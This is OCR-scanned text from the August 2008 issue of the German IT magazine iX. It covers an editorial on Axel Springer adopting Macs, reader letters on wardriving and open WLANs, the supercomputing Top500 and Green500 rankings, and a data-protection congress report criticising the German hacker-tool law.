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EDITORIAL 


August 2008 


Das Weiße im Auge 


Pin 40 Jahre nach den „Ent- 
eignet“-Forderungen und brennen- 
den Auslieferungsfahrzeugen bringt 
sich der Axel-Springer-Verlag wieder 
ins Gespräch. Diesmal allerdings nicht 
als Vertreter des Establishments, son- 
dern als kleine radikale Minderheit: 
In einer via Youtube ausgestrahlten 
Videobotschaft verkündigte der Vor- 
standsvorsitzende Mathias Döpfner 
die Abkehr von der dunklen Seite der 
Macht. 


Hinfort werde man sämtliche Arbeits- 
plätze des Konzerns mit Apple-Rech- 
nern ausstatten, und zwar aus vier 
Gründen: Macs seien schon immer 
beliebte Werkzeuge in der Druckindus- 
trie gewesen, sie seien „leichter zu 
bedienen als alle anderen“ und sähen 
hübsch aus. Schließlich kosteten 
Anschaffung und Wartung weniger als 
bei den Vorgängern. Vor allem diese 
Reihenfolge löst Verwunderung aus: 
Scheinbar hält ein in 33 Ländern 
aktives Unternehmen mit 10 000 Mit- 
arbeitern und einem Milliardenumsatz 
leichte Benutzbarkeit und elegantes 
Aussehen für wichtiger als Einspar- 
möglichkeiten. 


iX 8/2008 


Überraschen dürfte der Schwenk all 
jene, die Apple auf dem Weg vom 
Computerhersteller zur Lifestyle- 
Company schon fast am Ziel sahen. 
Rechner und Bürosoftware, so konnte 
man in den letzten Jahren häufiger von 
Apple-Fans hören, gerieten gegenüber 
den diversen Laut- und Bunt-Ange- 
boten immer mehr ins Hintertreffen. 
In Betrieben jenseits der kreativen 
Drei-Mensch-Klitsche spielten Apple 
und Mac OS X bislang jedenfalls 
keine nennenswerte Rolle. 


Was sicherlich auch daran liegen dürfte, 
dass das Unternehmen in Deutschland 
keine Infrastruktur für Firmenkunden 
vorweisen kann. Die einzige Support- 
Option war bis dato „Apple Care“. 
Vor-Ort-Reparaturen sieht dieser Plan 
nur vor, wenn ein autorisierter Ser- 
viceanbieter in der Nähe des Kunden 
ansässig ist. Eine Reparatur- oder auch 
nur Reaktionszeit garantiert er nicht. 


Springer, der damit zum größten 
europäischen Mac-Anwender wird, 
will die Einführung der Macs über 
fünf Jahre strecken. Ob diese Zeit 
reicht, um in allen Ländern eine 
Support-Organisation aufzubauen, die 
den Betrieb rund um die Uhr garan- 
tiert? Eine Alternative Könnte sein, 
innerhalb des Verlags die nötigen 
Kenntnisse und Infrastruktur bereit- 
zuhalten. Alles mag das Unternehmen 
jedenfalls nicht auf die Apple-Karte 
setzen, denn von der Umstellung auf 
Mac-Server war keine Rede. 


Ebenso wenig wie von einem voll- 
ständigen Umstieg auf Mac OSX. 
Vielmehr will der Verlag sowohl 
dieses als auch Windows auf den 
Macs einsetzen. Noch gibt es keine 
Informationen dazu, wie das gesche- 
hen soll — weder die deutsche 
VMware-Niederlassung noch Paral- 
lels wussten etwas über den Einsatz 
ihrer Virtualisierungstechnik dort. 


Der für Apple schlimmste Fall, dass 
seine Rechner nur den schicken 
Rahmen für ein per Bootcamp gestar- 
tetes schnödes Windows bilden, dürfte 
jedoch kaum eintreten. Denn immer- 
hin will Springer auch das iPhone ein- 
setzen, und das funktioniert zurzeit 
nur mit Apples OS X. Nicht zu ver- 
gessen Döpfners zweites Argument: 
Macs sind leichter zu bedienen als alle 
anderen Rechner. Allerdings nur, 
wenn auf ihnen das eigene Betriebs- 


Ss y stem läuft . 
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Embedded Systems: M2M-Kommunikation 


Je „intelligenter“ und vernetzter die uns umgebenden Gegenstände werden, 
desto komplexer wird der Informationsfluss. Unter der Bezeichnung Machine- 
to-machine-Kommunikation 
haben sich verschiedene 
Formen des Daten- 
austauschs zwischen 
Geräten etabliert. 


Seite 110 
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LESERBRIEFE 


August 2008 


.. 
Angeschrägt 
(Editorial: Schluss mit lustig; iX 1/08; S. 3) 


Ihr Editorial scheint mir symptomatisch 
für den angeschrägten Umgang mit 
Recht und Unrecht in unserer heutigen 
Zeit, nicht zuletzt — oder sogar be- 
sonders — im Dunstkreis der Informa- 
tionstechnologie. 

Seien es die Autofahrer, die bei der 
Vorstellung eines neuen Bußgeldkata- 
loges lauthals mit den verschiedensten 
Begründungen aufschreien — und sich 
selbst und anderen verschweigen, dass 
es ihnen eigentlich darum geht, mög- 
lichst preisgünstig weiterhin schneller 
zu fahren als auf den Schildern am 
Straßenrand steht. 

Seien es die Musikliebhaber, die das 
althergebrachte Recht zur Privatkopie 
ausgehebelt sehen — und sich selbst und 
anderen verschweigen, dass es ihnen 
dabei eigentlich darum geht, wie früher 
die Mucke von Bekannten zu kopieren. 

Oder seien es eben Technophile, die 
bei realitätsfremder Interpretation zur 
„Privatheit“ von IP-Adressen laut auf- 
schreien — und sich selbst und anderen 
verschweigen, dass es ihnen dabei ei- 
gentlich darum geht, mit der „Dumm- 
heit“ mancher WLAN-Betreiber gegen 
deren Willen technische Spielchen zu 
treiben. 

All das mag rechtlich, technisch 
oder sonstwie irgendwie argumentier- 
bar sein — wenn man sich aber mal auf 
so etwas Ungewohntes wie Moral zu- 
rückbesinnt, wird einem vielleicht auf- 
fallen, was man da eigentlich für eine 
Heuchelei veranstaltet. 

Ein berühmter Kopf namens Imma- 
nuel Kant hat einmal — zugegeben in 
wesentlich gebildeter klingenden Wor- 
ten — die Forderung an alle Menschen 
gerichtet: „Seht zu, dass ihr einander 
nicht auf die Füße tretet.“ 

Niemand unter der Wardriver-Frak- 
tion kann mir weismachen, die Betreiber 
der von ihnen ausgespähten WLAN- 
Netzwerke wollen, dass man sich in ihr 
WLAN einklinkt - dass es darum gehe, 
Netze zu finden, die öffentlich sein sol- 
len. Im Grunde steckt doch dahinter nur 
der Wunsch, die eigene technische Kre- 
ativität auszuleben — und den kreativen 
Umgang mit Gesetzen und Rechtferti- 
gungen gegebenenfalls gleich mit — oh- 
ne sich ernsthaft um die Interessen an- 
derer zu scheren. Spieltrieb pur auf 
technisch (und nötigenfalls rhetorisch 
und juristisch) hohem Niveau. 


CHRISTOPH LIPKA, VIA E-MAIL 


Grobe Fahrlässigkeit 
(Editorial: Schluss mit lustig; iX 1/08; S. 3) 


Ist es nicht so, dass man sein Cabrio 
ausreichend gegen Diebstahl zu schüt- 
zen hat? Macht man es nicht, bekommt 
man eine Anzeige. Die kann auch auf 
Verleitung zur Straftat lauten. Wenn 
ich mein Haus/Auto verlasse und die 
Türen und Fenster offen stehen lasse, 
habe ich nachher auch keinen Anspruch 
bei meiner Versicherung. 

Stellen sie sich folgende Situation 
vor: Ein Auto wurde von einem Unbe- 
kannten ohne Genehmigung genutzt. 
Der Geschädigte gibt bei der Polizei 
an: Am Montagabend habe ich ge- 
wohnheitsgemäß mein Auto unver- 
schlossen mit steckendem Zündschlüs- 
sel abgestellt. 

Vom Küchenfenster aus konnte ich 
beobachten, wie eine Person in meinen 
Wagen stieg und davonfuhr. Zwei Stun- 
den später kam die Person wieder zu- 
rück und stellte meinen Wagen wieder 
ab. Ich konnte den Vorgang zwei Wo- 
chen lang beobachten und gebe nun die 
unberechtigte Nutzung meines Autos 
zur Anzeige auf. 

Sollte es zu einer Anzeige kommen, 
würde ein Richter vermutlich eine Teil- 
schuld bzw. grobe Fahrlässigkeit unter- 
stellen. 

Es gibt auch Länder, in denen offene 
Accesspoints genutzt werden können, 
ohne dass man sich strafbar macht. Dort 
geht man davon aus: Wenn der AP of- 
fen ist, darf ihn auch jeder nutzen. 


PETER ACKERMANN, 
HALLERNDORF 
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Hersteller gefordert 
(Editorial: Schluss mit lustig; iX 7/08; S, 3) 


Ihr Editorial lese ich ziemlich regelmä- 
Big und mit Interesse, diesmal stimme 
ich jedoch in einigen wesentlichen 
Punkten nicht mit Ihnen überein. 

So schreiben Sie z. B.: „,... wie soll 
in der Logik des Wuppertaler Urteils 
ein Fall gewertet werden, bei dem sich 
ohne Zutun des Benutzers sein Rechner 
mit dem nächsten erreichbaren WLAN 
verbindet?“ 

Mit der Unerfahrenheit der Nutzer 
haben Sie sicher recht, nur gibt es auch 
hier zwei Varianten: 

— den von Ihnen angesprochenen uner- 
fahrenen User, dessen Notebook sich 
ohne sein Zutun mit dem nächsten offe- 
nen WLAN verbindet, und 

— den unerfahrenen User, dem man 
irgendwo einen häufig unnötigen 
WLAN-Router angedreht hat und der 
diesen ganz ahnungslos ohne Sicher- 
heitsmaßnahmen betreibt. 

Welche Unerfahrenheit ist da straf- 
würdig und welche nicht? Ausgehend 
von diesem Gedanken kann ich Ihren 
Ausführungen im nächsten Absatz noch 
weniger folgen: „Hätte sich der Wup- 
pertaler Richter nämlich mit der Frage 
befasst, welche Verhaltenweisen spür- 
bar negative Folgen nach sich ziehen, 
hätte er den Betreiber des offenen 
WLAN verurteilt.“ 

Sowohl der fahrlässige „offene“ Be- 
trieb eines WLAN wie auch die unbe- 
wusste Einwahl in ein solches basieren 
meist auf mangelnder Sachkenntnis, 
wen soll man da wohl mehr verurtei- 
len? Am besten gefällt mir aber der 
letzte Absatz: 

„Damit soll nicht der strafrecht- 
lichen Verfolgung von unbedarften 
Computer-Hobbyisten das Wort gere- 
det werden. Doch naheliegender als die 
Bestrafung folgenlosen Wardrivens 
wäre sie allemal.“ 

Finden Sie es wirklich naheliegen- 
der, unwissende oder unbedarfte User 
wegen ihres mangelnden Fachwissens 
zu bestrafen? Echte Wardriver sind 
demgegenüber wohl ziemlich gut mit 
entsprechendem technischem Wissen 
ausgestattet, führen ihre Aktionen auch 
ganz bewusst aus und sind daher aus 
meiner Sicht schon eher zu verurteilen. 
Nur weil ein Wardriver folgenlos agiert 
hat, Einbruch bleibt Einbruch. Ich darf 
auch nicht ganz einfach ihr Kfz benut- 
zen oder durch Ihre Wohnung laufen, 
nur weil Sie versehentlich nicht abge- 
schlossen haben. 
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Wichtiger erscheint mir hier die 
Rolle der Hersteller — weshalb sind 
WLAN-Router beim Verkauf grund- 
sätzlich völlig offen konfiguriert? 
Wäre es nicht sinnvoller, diese Kom- 
ponenten bereits entsprechend abge- 
sichert zu verkaufen, damit der Käu- 
fer/User ganz bewusst die von ihm 
benötigten Kommunikationswege (und 
nur diese) öffnen muss? Nur ein paar 
kleine Änderungen der Grundeinstel- 
lungen, und vieles wäre sicherer. Dar- 
über hinaus wären sich die User dar- 
über im Klaren, welche „Türen“ sie 
geöffnet haben und schon allein da- 
durch weniger unerfahren. 

Trotz abweichender Meinungen, ich 
freue mich schon auf die nächste iX. 


ECKARD REICHELT, VIA E-MAIL 


Zu viel ausgeblendet 


(Mikro-Blogging: Twitter — Blogging, Instant 
Messaging und SMS in einem; iX 7/08; S. 54) 


Schade, dass in dem Artikel lediglich 
auf die sozialen Aspekte von Twitter 
eingegangen wurde — und alle nicht- 
hypefähigen, interessanten Themen 
wie „Sicherheit“ und „Eigentum der 
Tweets“ ausgeblendet wurden ... Der 
Artikel erreicht nicht das übliche Qua- 
litätsniveau, das man von der iX ge- 
wohnt ist. 


GEBHARD THIER, VIA E-MAIL 


Ergänzungen und Berichtigungen 


(Sicherheit: Neue Modalitäten für Nessus-Plug- 


ins; iX 1/08; 3. 22) 


Schon in der Vorgängerversion wur- 
de Nessus proprietär, geändert hat 
sich mit Version 3 der Erscheinungs- 
termin der Updates: Der kostenlose 
Plug-in-Feed für nicht kommerzielle 
Benutzer erscheint nun gleichzeitig 
mit dem Bezahl-Feed. Im Inhaltsver- 
zeichnis Seite 6 hat sich derselbe Feh- 
ler eingeschlichen. 


(Leserbriefe: Nicht ganz so restriktiv; iX 7/08; S. 8) 


Die Antwort der Redaktion hätte hei- 
ßen müssen „... ebenso wenig wie in 
der jeweiligen SBS-Domäne weitere 
SBS-Server, die eine der sogenannten 
Flexible Single Master Operations 
(FSMO) übernehmen.“ 


MARKT + TRENDS 


Supercomputer 


ISC 2008: Cluster, Kühlung und weite Strecken 


Wachsende Resonanz auf 
der International Supercom- 
puting Conference (ISC) 
wird zu einem Ortwechsel 
führen. Es geht weniger um 
die mit 1350 um 11 % ge- 
stiegenen Besucherzahlen, 
sondern den Ausstellungsbe- 
reich, der im Dresdner Kon- 
gresszentrum an seine Ka- 
pazitätsgrenzen gestoßen ist. 
Die ISC 2009 wird in Ham- 
burg stattfinden. 


Auf Clustern lag der Schwer- 
punkt der ISC-Ausstellung, vor 
allem auf solchen mit Multi- 
Core-Prozessorenknoten und 
flexiblen Architekturen. Bei 
Großkunden geht der Trend in 
Richtung heterogene Strukturen 
mit dedizierten Prozessortypen 
für spezifische Aufgaben. 
Energieversorgung und Küh- 
lung stehen bei Rechenclustern 
inzwischen im Mittelpunkt. 
SGI setzt auf ein Rack-System, 
bei dem die Aggregate die aus- 
tretende Luft kühlen, wodurch 
die Raumtemperatur auf niedri- 
gem Niveau bleibt. HP stellt 
das Rack in einen hermetisch 
geschlossenen Schrank, dessen 
Flüssigkeitskühlung die Luft in 
das Rack zurückführt. 
Bedeutsamer für Europa als 
der Petaflops-Computer, der in 
Los Alamos seinen Dienst auf- 
nehmen soll (siehe unten und 
iX 7/08, S. 20), war IBMs Prä- 
sentation des High Performan- 
ce Computing (HPC) Node 
„iDataPlex“. Big Blue hat zu- 
sammen mit der Universität 
von Umea in Schweden den 


größten Windows-Rechenclus- 
ter in Europa aufgebaut. Er hat 
eine Leistung von 46 TFlop/s 
und arbeitet mit Intels Xeon- 
Quad-Core-Prozessoren. 


Fernverkehr mit IB 


Voltaire, der 1997 gegründeten 
israelische Entwickler von Ver- 
bindungstechniken für Grid und 
HPC, ansässig in Herzeliya, 
kündete von Altem und Neuem. 
Bekannt war seit Mai, dass es 
nun auch eine offizielle Unter- 
stützung des Engenio 7900 
HPC Storage System von LSI 
gebe. Für Aufmerksamkeit 
sorgte die Ankündigung, auf 
Basis des von Mellanox ange- 
kündigten Chips „Infiniscale 
IV“ einen 40-Gbps-Infiniband- 
Switch zu entwickeln. Doch da- 
mit ist Voltaire nicht allein: Fast 
alle namhaften Anbieter haben 
40-Gbps-Switches auf Grundla- 
ge des Chips für 2008 angekün- 
digt. Laut IDC soll die Nutzung 
von Infiniband von 2006 bis 
2011 um 54,4 % zunehmen. 
Gemeinsam mit Adva Opti- 
cal Network, Obsidian Strate- 
gics und dem High Performance 
Computing Center (HLRS) in 
Stuttgart konnte Voltaire ver- 
künden, dass Infiniband-Ver- 
bindungen über 50 km einen 
Test erfolgreich bestanden hat- 
ten. Dazu hatte das Team mehr 
als 500 Knoten des Baden- 
Württembergischen Grid-Clus- 
ters über zwei Grid Director 
2012 Switches von Voltaire mit 
je 288 Ports verbunden. Obsi- 
dians Range-Extending Switch 


Longbow Campus tunnelte das 
4x-SDR-Infiniband-Signal (10 
GBit) über die Dark-Fibre-Stre- 
cke, der Wavelength Division 
Multiplexer FSP (Fibre Service 
Platform) von Adva verband 
die Standorte. Bis dato nutzen 
Rechenzentren Infiniband zur 
internen Verbindung von Clus- 
tern am Ort. 

Clearspeed kündigte sein 
Advance e710 Accelerator 
Board und den CSX700 Prozes- 
sor an. Mit 96 GFlop/s soll das 
Board ein Drittel weniger 
Strom verbrauchen als der Vor- 
gänger. Ein einzelnes Advance 
e710 Board kann einen Dual- 
Socket-Quad-Core-Server um 
über die Hälfte steigern, gemes- 
sen mit Linpack. Außerdem 
stellte Clearspeed seine CATS- 
700 Accelerator Appliance vor. 
Sie bietet 1,1 TFlop/s Beschleu- 


nigung bei doppelter Genauig- 
keit im 1-U-Formfaktor. Um 
mehr Performance geht es auch 
bei AMDs Tochter ATI: Deren 
FireStream 9250 soll über 
1 TFlops bei einfacher Genau- 
igkeit erreichen. Die Karte 
steckt in einem PCI-Slot und 
braucht weniger als 150 Watt. 
Das SDK steht unter Open- 
Source-Lizenz. 

Derzeit sind Supercompu- 
ting und HPC ein Synonym, es 
gibt aber Diskussionen um dif- 
ferenzierte Definitionen: Wäh- 
rend ein Supercomputer hoch- 
performante, große Strukturen 
bezeichnet, scheint sich der 
Terminus HPC auf kleine, aber 
leistungsfähige Systeme auszu- 
weiten (www.supercomp.de/ 


1sc08). Nikolai Zotow 
Eix-ink ix0808010 


Kühltür: Bei SGI kühlen die Aggregate in der Rückwand die Abluft 
der Rechner auf Raumtemperatur herunter. 


Top500: Ein Hybrid-Cluster hat die Petaflops-Grenze geknackt 


Die aktuelle Top500 hat eine 
Marke zu bieten: Die Petaflops- 
Grenze ist gefallen. Geschafft 
hat es der Roadrunner von 
IBM, der mit 122 400 Prozes- 
sorkernen und einer Hybrid- 
struktur aus PowerXCell-8i- 
und Dual-Core-Opteron-CPUs 
eine Spitzenleistung von 1026 
Teraflop/s erreicht. Das System 
steht allerdings noch nicht an 
seinen Bestimmungsort, son- 
dern bei IBM. Der Bestplatzier- 
te der Vorjahre fiel auf Platz 
zwei zurück. IBMs eServer 
BlueGene/L am LLNL erreicht 
mit 212 992 PowerPC-Kernen 
478,2 TFlop/s. Auf Rang 3 
folgt die BlueGene/P am Ar- 
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gonne National Laboratory mit 
450,3 TFlop/s mit 163 840 Ker- 
nen. Erst Platz 4 geht an einen 
anderen Hersteller: Sun. Der 
Ranger an der Universität von 
Texas erreicht mit 62 976 Pro- 
zessorkernen 326 TFlop/s. 

Der schnellste Rechner Eu- 
ropas steht immer noch in 
Deutschland: IBMs JUGENE 
am Forschungszentrum in Jü- 
lich nimmt Rang 6 ein. Die 
USA - das Land mit den meis- 
ten Supercomputern — musste 
leichte Einbußen hinnehmen. 
Standen im November 2007 
noch 281 Rechner dort, waren 
es nun in der Juniliste nur noch 
257 - immer noch mehr als die 


Hälfte. Dafür haben andere auf- 
geholt: Großbritannien konnte 
sich von 49 auf 53 steigern, 
Frankreich sogar von 17 auf 34 
verdoppeln und Japan um zwei 
Systeme auf 22 zulegen. 
Deutschland hat in einem hal- 
ben Jahr weitere 15 Superrech- 
ner aufgebaut und steht mit 46 
Rechnern auf Platz drei hinter 
den USA und Großbritannien. 
Bei den Herstellern konnte 
HP gegenüber IBM etwas Bo- 
den gewinnen und sich von 166 
auf 183 Rechner steigern. Bei 
IBM schrumpfte die Zahl um 
23 auf 209: das reichte aber im- 
mer noch für den ersten Platz. 
Die nächstplatzierten sind in 


der aktuellen Liste Dell (25), 
SGI (22), und Cray (16). Sun, 
Appro, Linux Networks, Fujit- 
su und Hitachi kommen auf je 
vier Installationen. 

Nach wie vor führen die 
Cluster mit Blade-Servern. 75 % 
laufen mit Intels Prozessoren. 
Bei AMD haben es nur noch 55 
in die Liste geschafft, vormals 
waren es noch 79, aber davon 
drei in den Top 10. Der über- 
wiegende Teil der Supercompu- 
ter arbeitet mit Linux. Microsoft 
treibt mit seinem HPC Server 
2008 fünf von fünfhundert Sys- 
temen an; eins weniger als in 
der letzten Aufstellung (www. 
top500.org). Nikolai Zotow 
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Grüne 500 in blauer Hand 


Um es kurz zu machen: 
Natürlich hat Big Blue auch 
das Rennen um die Spitzen- 
position der Green500 
(www.green500.org) wieder 
gewonnen - und belegt fast 
allein die folgenden 47 Plät- 
ze, gestört nur von drei SGI- 
Altix-ICE-8200EX-Syste- 
men: eines auf Platz 17 und 
die beiden noch getrennten 
Hälften des Berliner-hanno- 
verschen Clusters HLRN HI 


auf Platz 41 (s. Seite 26). 


Platz 1 teilen sich mit 488,14 
MFlops/W die zwei neuen 
Bladecenter QS22 Cluster, de- 
ren Knoten mit 3,2 GHz schnel- 
len PowerXCells 8i rechnen 
und über Infiniband miteinan- 
der kommunizieren. Beide ste- 
hen in Deutschland: einer am 
Fraunhofer-Institut für Techno- 
und Wirtschaftsmathematik 
ITWM (Top500-Rang 324), 
der andere bei IBM in Böblin- 
gen (Top500-Rang 464). 

Auf Platz 3 des nach Ener- 
gieeffizienz sortierten Top500- 
Ablegers findet sich dann schon 
der Petaflops-Rechner „Road- 
runner“. Der Hybrid-Cluster 
aus 12960 PowerXCells 8i und 
6912 Opteron-Dual-Core (1,8 
GHz) benötigt für seine Re- 
chenpower von 1026 TFlops 
insgesamt 2345,5 kW, also 
437,43 MFlops/W. Zum Ver- 
gleich: Der Spitzenreiter der 
letzten Jahre (November 2004 
bis November 2007), der Blue 
Gene/L eServer am US-ameri- 
kanischen Lawrence Livermore 
National Laboratory (LLNL), 
kommt bei annähernd gleicher 
Leistungsaufnahme (2325,6 
kW) auf 478,2 TFlops, also 
205,27 MFlops/W und damit 
Platz 43 der Green500. 

Sein Vorgänger, der japani- 
sche Earth Simulator I, der die 
Top500 von Juni 2002 bis Juni 
2004 anführte (jetzt Platz 49), 
verbraucht für seine 35,86 
TFlops - kalkulierte — 6,4 Me- 
gawatt (5,6 MFlops/W, Platz 
499); in seiner Energieineffi- 
zienz nur noch übertroffen 
vom Intel Itanium 2 Tiger 4 
(14 GHz) am LLNL mit 
4915,2 kW auf 19,94 TFlops 
(Top500-Rang 89), also 4,06 
MFlops/W (Platz 500). 

Insgesamt kommen die 500 
schnellsten Rechner der Welt 
auf stolze 170,58 MW, 9,7 % 
mehr als noch im November 
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2007 (155,95 MW nach der im 
Februar bereinigten Green500). 
Gleichzeitig hat sich die Zahl 
der gelisteten Megawatt-Rech- 
ner von 14 auf 24 erhöht - sie 
schlagen mit knapp 50 MW 
zubuche. 20 von ihnen sind al- 
lein unter den ersten 50 zu fin- 
den. 

Vergleicht man allerdings 
die Zahlen zu den Megawatt- 
Rechnern in der Top- und der 
Green500, kommen Zweifel an 
dem ganzen Zahlenwerk auf: 
Für die auf den Top500-Plät- 
zen 5 (Crays Jaguar am Oak 
Ridge National Laboratory), 
8 (HPs Blade-Cluster EKA an 
den indischen Computational 
Research Laboratories) und 15 
(Crays Franklin am National 
Energy Research Scientific 
Computing Center in Berke- 
ley) geführten Rechner gibt die 
Green500 mindestens doppelt 
so hohe Werte für die Leis- 
tungsaufnahme aus wie die 
Top500. 

Für Suns Ranger am Texas 
Advanced Computing Center 
der University of Texas 
(Top500 Platz 4) differieren 
die Angaben von 2 und 5,5 um 
satte 3,5 Megawatt. Und wie 
um die Verwirrung perfekt zu 
machen, gibt die c’t in der 
Ausgabe 5/2008, „Super Fri- 
day, Einweihung der beiden 
schnellsten zivilen Supercom- 
puter der Welt“, wiederum an- 
dere Werte an: 34 MW maxi- 
maler Gesamtenergieverbrauch 
inklusive Storage und allem 
Gepäck (www.heise.de/ct/08/ 
05/046). Der dort ebenfalls ge- 
würdigte Jülicher Supercom- 
puter Jugene kommt dagegen 
auf maximal 0,64 MW ohne 
Storage, in der Green500 mit 
0,504 MW Gesamtverbrauch 
geführt. 

Ebenfalls auffällig an der 
aktuellen Green500 ist die ho- 
he Zahl identischer Werte bis 
zur zweiten Stelle hinterm 
Komma. Ganze 37 der vorders- 
ten 106 Systeme müssen ihren 
Platz nicht mit anderen teilen. 
Allein unter den ersten 11 bean- 
spruchen zwei Rechner Platz 1, 
drei Platz 4 und fünf weitere 
Platz 7. Einzig der Roadrunner 
verteidigt noch seine Stellung 
als Unikat. Das zeigt den 
Trend: Supercomputer von der 
Stange, exemplarisch gemes- 
sen an einem Rechenknoten. 

Susanne Nolte 
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MARKT + TRENDS 


Datenschutz 


Vernichtende Kritik auf dem DuD-Kongress 


Abgesang 


Ute Roos 


Uferloser Datenexhibitionismus im Web 2.0, ein 
Staat, der an der Grenze zum Überwachungsstaat 
steht und seine Bürgerschutzpflichten vernachlässigt 
sowie ein „Kungelverein”, der staatliche Aufgaben an 
sich reißt - die Expertenanalyse zur gegenwärtigen 
Datenschutzsituation auf der DuD-Konferenz fiel 
ernüchternd bis desaströs aus. 


bgleich Besucher sowie 

Referenten der zehnten 
Konferenz „Datenschutz und 
Datensicherheit“ meist haupt- 
beruflich mit der Thematik be- 
fasst waren, fielen die Meinun- 
gen zum Ist- und Soll-Zustand 
des Datenschutzes sehr kontro- 
vers aus. So stellte etwa Si- 
cherheitsberater Jörg Eckhardt 
ein relativ simples Programm 
in vier Punkten vor, wie man 
bei Mobilfunkanbietern mehr 
Datenschutz erreichen könne. 

Eines der Ziele ist das Ver- 
meiden unnötiger Datensamm- 
lungen. Die Mobilfunkanbieter 
seien ohnehin auf Datenspar- 
samkeit aus, erläuterte Eck- 
hardt. Der prompt folgende 
Zwischenruf „das ist neu!“ ern- 
tete Gelächter und zeigte, dass 
die Zuhörer diesen Optimismus 
mitnichten teilten. 

Praxisnah war auch der 
Vortrag von Heidi Schuster 
von der Max-Planck-Gesell- 
schaft zum Umgang mit dem 
„Hackerparagrafen“ im Unter- 
nehmen. Zwar gab sie ebenso 
wie viele andere Rechtsexper- 
ten in jüngster Zeit Entwar- 
nung, was den Gebrauch der 
sogenannten Hackertools im 
eigenen Unternehmen zu Si- 
cherheitszwecken anbelangt. 
Eine Sache jedoch bleibt pro- 
blematisch: das Besorgen der 
Tools. Das wurde in der an- 
schließenden lebhaften Diskus- 
sion mehr als deutlich. 


Burkhard Hirsch: Der Staat 
muss aufhören, Grundrechte 
einzuschränken und die 
Grenzen der Verfassung zu 
belasten. 


12 


Das Beispiel, das Heidi 
Schuster heranzog, demons- 
trierte, wie haarsträubend un- 
logisch und unüberlegt hier der 
Gesetzgeber vorgegangen war: 
Kauft jemand ein Messer — das 
man ebenso wie Hackerwerk- 
zeuge zum Guten oder Bösen 
benutzen kann -, ist dieser Kauf 
allein noch nicht strafbar, son- 
dern erst der Versuch, jeman- 
den damit zu verletzen oder zu 
töten, oder aber die erfolgrei- 
che Durchführung der Tat. So 
weit, so nachvollziehbar. 


Haarsträubende 
Gesetzgebung 


Im Fall der Hackertools wur- 
de jedoch die Strafbarkeit vor- 
verlagert und der Zwischen- 
schritt des Versuchs fiel weg: 
Allein der Erwerb ist strafbar, 
selbst wenn man nichts Böses 
damit im Schilde führt. Merk- 
würdigerweise ist jedoch der 
Versuch, mit diesen Werkzeu- 
gen irgendwo einzubrechen 
oder etwas zu manipulieren, 


nicht strafbar, erst wieder die 
vollendete Tat. Absurder geht 
es kaum, war einhellig die 
Meinung. 

Unternehmen stehen nun vor 
der Schwierigkeit, ihre Systeme 
zwar noch auf Sicherheitslü- 
cken testen zu dürfen, sich aber 
nicht mehr legal die Werkzeu- 
ge beschaffen zu können. Ex- 
perten hatten schon im Vorfeld 
der Gesetzgebung auf diesen 
fatalen Umstand aufmerksam 
gemacht — ohne Reaktion sei- 
tens des Gesetzgebers. Eine 
Verfassungsbeschwerde des Se- 
curity-Dienstleisters Visukom 
liegt dem BVG vor, wird aber 
voraussichtlich nicht mehr in 
diesem Jahr entschieden. 

Neue Wege des Datenschut- 
zes will die Teletrust beschrei- 
ten. In Kürze will der Verein 
Version 1.0 eines Kodexes 
veröffentlichen, mit dem sich 
Anbieter aller Art von Inter- 
netdienstleistungen selbst zu 
datenschutzfreundlichem Ver- 
halten verpflichten — Stichwort 
„sichere elektronische Iden- 
titäten“. Die acht Punkte rei- 
chen vom Selbstbestimmungs- 
prinzip für den Anwender, der 
über die Preisgabe seiner per- 
sönlichen Daten selbst ent- 
scheiden können soll, über Da- 
tensparsamkeit und Transparenz 
bis hin zur Bewusstseinsbil- 
dung des Nutzers. 

Damit kam der Teletrust- 
Vertreter jedoch nicht bei allen 
gut an. Johann Bizer, vormals 
beim ULD Schleswig-Holstein, 
jetzt Vorstand des IuK-Dienst- 
leiters Dataport, kritisierte, dass 
nicht ein „Kungelverein“ für 
den Schutz der Bürger und des- 
sen elektronische Identitäten zu- 
ständig sei, sondern der Gesetz- 
geber. Denn schließlich habe er 
diese Identitäten im Gesetz ver- 
ankert — etwa beim elektroni- 
schen Personalausweis. 


Kungelverein springt 
in die Bresche 


Wenn der Staat Risiken verur- 
sache, dann müsse er auch zu 
ihrer Minimierung beitragen. 
Das Gegenteil sei aber der 
Fall. So weigere sich das Bun- 
desinnenministerium seit Jah- 
ren trotz mehrmaliger Auffor- 
derung durch das Parlament, 
eine Modernisierung des Daten- 
schutzes einzuleiten. Stattdes- 
sen wollten nun die Verbände 
die Arbeit für die Regierung 
übernehmen. Ihm sei im Übri- 


gen keine Selbstverpflichtung 
in Sachen Datenschutz bekannt, 
in der Unternehmen über das 
gesetzlich geregelte Mindest- 
niveau hinausgingen. 

Dirk Fox von Secorvo mo- 
nierte folgerichtig, dass die 
Teletrust-Selbstverpflichtung 
weit hinter das Bundesdaten- 
schutzgesetz zurückfiele, etwa 
in Hinblick auf die Zweckbe- 
stimmung der Daten oder die 
Löschungsverpflichtung. Und 
das, was in ihr steht, sei ohne- 
hin gesetzliche Pflicht. Der Re- 
ferent versprach etwas lapidar, 
die Einwände der Teletrust zu 
Gehör zu bringen, die Sinnlo- 
sigkeit der Selbstverpflichtung 
wurde allerdings augenfällig. 

Die gesellschaftlichen Aus- 
wirkungen staatlicher Über- 
wachung skizzierte Burkhard 
Hirsch, Jurist, Bürgerrechtler 
und zu RAF-Zeiten Innenminis- 
ter von Nordrhein-Westfalen, in 
erschreckender Weise. Mit der 
Einführung der Vorratsdaten- 
speicherung hätte Deutschland, 
das an der Grenze zwischen 
Präventionsstaat und Überwa- 
chungsstaat stünde, die Schwel- 
le zu Letzterem überschritten. 
„Ich bin empört über die Ver- 
schleppung der Verfassungs- 
beschwerde durch die Fristset- 
zung Ende Oktober“, so Hirsch 
und: „Ich bin empört über die 
Aussage des Innenministers, 
das BKA-Gesetz enthalte nichts 
Neues.“ Entweder, so Hirsch 
weiter, der Innenminister kenne 
das Gesetz nicht oder er sagt 
bewusst die Unwahrheit. 

Das BKA-Gesetz enthält Be- 
fugnisse, in den privaten Wohn- 
raum und in Computer von 
Bürgern einzubrechen. Außer- 
dem vermischen sich die Kom- 
petenzen von Polizei und Nach- 
richtendiensten immer stärker 
— laut Hirsch „völlig unvertret- 
bar“ und ebenso Bestandteil 
eines Überwachungsstaats wie 
die kontinuierliche Ausdeh- 
nung des Strafrechts auf Vor- 
bereitungshandlungen. Immer 
mehr tendiere man zur vorhe- 
rigen Überwachung statt zur 
Aufklärung von Straftaten. Er 
appellierte an die Standfestigkeit 
der Politiker in diesen schweren 
Zeiten. 

